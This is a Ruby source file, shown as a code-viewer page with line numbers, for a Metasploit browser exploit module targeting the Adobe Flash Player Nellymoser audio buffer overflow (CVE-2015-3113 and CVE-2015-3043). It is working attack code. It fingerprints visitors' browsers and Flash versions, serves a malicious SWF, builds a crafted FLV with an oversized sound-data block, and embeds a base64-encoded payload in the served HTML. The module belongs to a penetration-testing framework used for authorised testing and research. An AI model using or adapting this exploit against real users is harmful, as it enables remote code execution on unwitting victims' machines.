Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
32442 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::BrowserExploitServer

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser

18
          encoded audio inside a FLV video, as exploited in the wild on June 2015. This module

19
          has been tested successfully on:

20


21
          Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,

22
          Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,

23
          Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,

24
          Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and

25
          Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.

26


27
          Note that this exploit is effective against both CVE-2015-3113 and the

28
          earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression

29
          to the same root cause as CVE-2015-3043.

30
        },

31
        'License' => MSF_LICENSE,

32
        'Author' => [

33
          'Unknown', # Exploit in the wild

34
          'juan vazquez' # msf module

35
        ],

36
        'References' => [

37
          ['CVE', '2015-3043'],

38
          ['CVE', '2015-3113'],

39
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],

40
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],

41
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],

42
          ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],

43
          ['URL', 'http://bobao.360.cn/learning/detail/357.html']

44
        ],

45
        'Payload' => {

46
          'DisableNops' => true

47
        },

48
        'Arch' => [ARCH_X86],

49
        'BrowserRequirements' => {

50
          source: /script|headers/i,

51
          arch: ARCH_X86,

52
          os_name: lambda do |os|

53
            os =~ OperatingSystems::Match::LINUX ||

54
              os =~ OperatingSystems::Match::WINDOWS_7 ||

55
              os =~ OperatingSystems::Match::WINDOWS_81

56
          end,

57
          ua_name: lambda do |ua|

58
            case target.name

59
            when 'Windows'

60
              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF

61
            when 'Linux'

62
              return true if ua == Msf::HttpClients::FF

63
            end

64


65
            false

66
          end,

67
          flash: lambda do |ver|

68
            case target.name

69
            when 'Windows'

70
              return true if ver =~ /^18\./ && Rex::Version.new(ver) <= Rex::Version.new('18.0.0.161')

71
              return true if ver =~ /^17\./ && Rex::Version.new(ver) != Rex::Version.new('17.0.0.169')

72
            when 'Linux'

73
              return true if ver =~ /^11\./ && Rex::Version.new(ver) <= Rex::Version.new('11.2.202.466') && Rex::Version.new(ver) != Rex::Version.new('11.2.202.457')

74
            end

75


76
            false

77
          end

78
        },

79
        'Targets' => [

80
          [

81
            'Windows',

82
            {

83
              'Platform' => 'win'

84
            }

85
          ],

86
          [

87
            'Linux',

88
            {

89
              'Platform' => 'linux'

90
            }

91
          ]

92
        ],

93
        'Privileged' => false,

94
        'DisclosureDate' => '2015-06-23',

95
        'DefaultTarget' => 0,

96
        'Notes' => {

97
          'Reliability' => UNKNOWN_RELIABILITY,

98
          'Stability' => UNKNOWN_STABILITY,

99
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

100
        }

101
      )

102
    )

103
  end

104


105
  def exploit

106
    @swf = create_swf

107
    @flv = create_flv

108


109
    super

110
  end

111


112
  def on_request_exploit(cli, request, target_info)

113
    print_status("Request: #{request.uri}")

114


115
    if request.uri =~ /\.swf$/

116
      print_status('Sending SWF...')

117
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache' })

118
      return

119
    end

120


121
    if request.uri =~ /\.flv$/

122
      print_status('Sending FLV...')

123
      send_response(cli, @flv, { 'Content-Type' => 'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache' })

124
      return

125
    end

126


127
    print_status('Sending HTML...')

128
    send_exploit_html(cli, exploit_template(cli, target_info), { 'Pragma' => 'no-cache' })

129
  end

130


131
  def exploit_template(cli, target_info)

132
    swf_random = "#{rand_text_alpha(rand(4..6))}.swf"

133
    target_payload = get_payload(cli, target_info)

134
    b64_payload = Rex::Text.encode_base64(target_payload)

135
    os_name = target_info[:os_name]

136


137
    if target.name =~ /Windows/

138
      platform_id = 'win'

139
    elsif target.name =~ /Linux/

140
      platform_id = 'linux'

141
    end

142


143
    html_template = %(<html>

144
    <body>

145
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />

146
    <param name="movie" value="<%=swf_random%>" />

147
    <param name="allowScriptAccess" value="always" />

148
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />

149
    <param name="Play" value="true" />

150
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>

151
    </object>

152
    </body>

153
    </html>

154
    )

155


156
    return html_template, binding

157
  end

158


159
  def create_swf

160
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')

161
    swf = ::File.open(path, 'rb') { |f| swf = f.read }

162


163
    swf

164
  end

165


166
  def create_flv

167
    header = ''

168
    header << 'FLV' # signature

169
    header << [1].pack('C') # version

170
    header << [4].pack('C') # Flags: TypeFlagsAudio

171
    header << [9].pack('N') # DataOffset

172


173
    data = ''

174
    data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0

175
    data << "\xee" * 0x440 # SoundData

176


177
    tag1 = ''

178
    tag1 << [8].pack('C')  # TagType (audio)

179
    tag1 << "\x00\x04\x41" # DataSize

180
    tag1 << "\x00\x00\x1a" # TimeStamp

181
    tag1 << [0].pack('C')  # TimeStampExtended

182
    tag1 << "\x00\x00\x00" # StreamID, always 0

183
    tag1 << data

184


185
    body = ''

186
    body << [0].pack('N') # PreviousTagSize

187
    body << tag1

188
    body << [0xeeeeeeee].pack('N') # PreviousTagSize

189


190
    flv = ''

191
    flv << header

192
    flv << body

193


194
    flv

195
  end

196
end

197


198